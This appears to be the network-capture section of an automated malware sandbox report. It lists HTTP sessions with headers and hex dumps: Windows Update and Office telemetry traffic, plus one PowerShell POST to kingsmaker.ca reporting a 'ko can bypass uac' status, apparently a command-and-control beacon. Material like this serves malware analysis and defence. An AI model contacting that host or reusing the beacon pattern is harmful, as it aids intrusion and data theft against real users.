                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                            2024-11-29 07:30:39 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.54971020.109.210.53443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=txFb4ztSLLEgxVe&MD=N4lU5e1w HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept: */*
                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                            2024-11-29 07:30:39 UTC560INHTTP/1.1 200 OK
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Expires: -1
                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                            MS-CorrelationId: cf7b8540-7a76-4d1e-8c34-64ef38ae7f76
                                                                                                                            MS-RequestId: 01719f82-976a-4af5-a556-4dd5463fa910
                                                                                                                            MS-CV: c7F2Ai6g10W3sKok.0
                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:38 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 24490
                                                                                                                            2024-11-29 07:30:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                            2024-11-29 07:30:39 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.549717104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:40 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b667154084aaf3afc1b0f9d6a14a3503e3e HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 62
                                                                                                                            2024-11-29 07:30:40 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                                            Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                                                            2024-11-29 07:30:41 UTC1006INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5OuByTZVMuYe08JtJi0hp3K3eZCF7L2XkF3F%2FslEpaEIFLOiR7puAjPCly4edfP%2B4i9Otx3%2Btq1zqP0mhjTsMILCxmN%2F%2FYtSb%2FYDTJfKvhm9GZY1ubZk0zT9gttUSQ681NB6wK%2B8G0i"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=41513&min_rtt=1013&rtt_var=28758&sent=19560&recv=9553&lost=0&retrans=0&sent_bytes=27517358&recv_bytes=289215&delivery_rate=47135761&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e4cdd8809e16-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1957&rtt_var=746&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1005&delivery_rate=1456359&cwnd=188&unsent_bytes=0&cid=90fbd48e39ee68a8&ts=1045&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            11192.168.2.54971913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:41 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:41 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 450
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                            x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073041Z-174f784596886s2bhC1EWR743w0000000zkg000000008ug2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:41 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            12192.168.2.54972213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:41 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:41 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2160
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                            x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073041Z-174f7845968vqt9xhC1EWRgten0000000zs00000000013tu
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:41 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            13192.168.2.54972113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:41 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:41 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2980
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                            x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073041Z-174f7845968nxc96hC1EWRspw80000000z7g00000000c1e4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:41 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            14192.168.2.54972013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:41 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:41 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 3788
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                            x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073041Z-174f7845968xr5c2hC1EWRd0hn0000000gb000000000bbq4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:41 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            15192.168.2.54972313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:41 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:41 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:41 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 408
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                            x-ms-request-id: e4b3ee88-e01e-0071-3267-4008e7000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073041Z-174f784596886s2bhC1EWR743w0000000zk000000000a588
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:41 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            16192.168.2.54972413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:43 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:43 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:43 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 474
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                            x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073043Z-174f784596886s2bhC1EWR743w0000000zk000000000a59e
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:43 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            17192.168.2.54972813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:44 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:44 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:44 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 467
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                            x-ms-request-id: 33ff7c98-601e-0097-063e-40f33a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073044Z-174f7845968nxc96hC1EWRspw80000000z90000000009xta
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:44 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
